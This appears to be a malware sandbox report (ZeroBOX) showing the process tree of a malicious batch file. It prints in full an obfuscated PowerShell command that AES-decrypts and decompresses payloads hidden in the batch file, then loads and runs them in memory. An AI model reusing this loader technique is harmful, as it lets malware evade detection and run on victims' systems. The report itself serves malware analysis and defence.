popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "vfrjvoBTejgvVag" C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat

    2568

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat

      2644

      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat

        2756

        • Hceea_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat.exe" -w hidden -c $pEMo='TraMBJvnsfMBJvorMBJvmFMBJvinaMBJvlBlMBJvoMBJvckMBJv'.Replace('MBJv', '');$iyaC='LMBJvoMBJvadMBJv'.Replace('MBJv', '');$tcQw='RMBJveadLMBJviMBJvneMBJvsMBJv'.Replace('MBJv', '');$KuMS='CMBJvhMBJvangMBJveEMBJvxMBJvtenMBJvsioMBJvnMBJv'.Replace('MBJv', '');$trmt='CreMBJvateDMBJvecMBJvrMBJvypMBJvtorMBJv'.Replace('MBJv', '');$fUaA='GeMBJvtMBJvCurMBJvrentMBJvProMBJvcMBJveMBJvssMBJv'.Replace('MBJv', '');$jFAl='EMBJvleMBJvmeMBJvntAMBJvtMBJv'.Replace('MBJv', '');$GMsR='SplMBJvitMBJv'.Replace('MBJv', '');$SgZi='EntMBJvrMBJvyMBJvPMBJvoMBJvinMBJvtMBJv'.Replace('MBJv', '');$AotJ='FrMBJvomBaMBJvsMBJve6MBJv4StMBJvriMBJvngMBJv'.Replace('MBJv', '');$NumX='MMBJvainMBJvModMBJvulMBJveMBJv'.Replace('MBJv', '');$SCtU='IMBJvnvMBJvokMBJveMBJv'.Replace('MBJv', '');function gYYuy($Ztzwf){$NuTmR=[System.Security.Cryptography.Aes]::Create();$NuTmR.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NuTmR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NuTmR.Key=[System.Convert]::$AotJ('9RE7z9qQbXo70lNlRZf0jPT2QRG4KCsVkZBJkUBk4l4=');$NuTmR.IV=[System.Convert]::$AotJ('A1++iPLzbLBcVKc2yItI3g==');$BvNdb=$NuTmR.$trmt();$wrDar=$BvNdb.$pEMo($Ztzwf,0,$Ztzwf.Length);$BvNdb.Dispose();$NuTmR.Dispose();$wrDar;}function pFMIH($Ztzwf){$XcMqn=New-Object System.IO.MemoryStream(,$Ztzwf);$ffVFP=New-Object System.IO.MemoryStream;$MiwFe=New-Object System.IO.Compression.GZipStream($XcMqn,[IO.Compression.CompressionMode]::Decompress);$MiwFe.CopyTo($ffVFP);$MiwFe.Dispose();$XcMqn.Dispose();$ffVFP.Dispose();$ffVFP.ToArray();}$uxbhR=[System.Linq.Enumerable]::$jFAl([System.IO.File]::$tcQw([System.IO.Path]::$KuMS([System.Diagnostics.Process]::$fUaA().$NumX.FileName, $null)), 1);$XmldQ=$uxbhR.Substring(2).$GMsR(':');$bUPcU=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[0])));$LzWhx=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[1])));[System.Reflection.Assembly]::$iyaC([byte[]]$LzWhx).$SgZi.$SCtU($null,$null);[System.Reflection.Assembly]::$iyaC([byte[]]$bUPcU).$SgZi.$SCtU($null,$null);

          2852

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf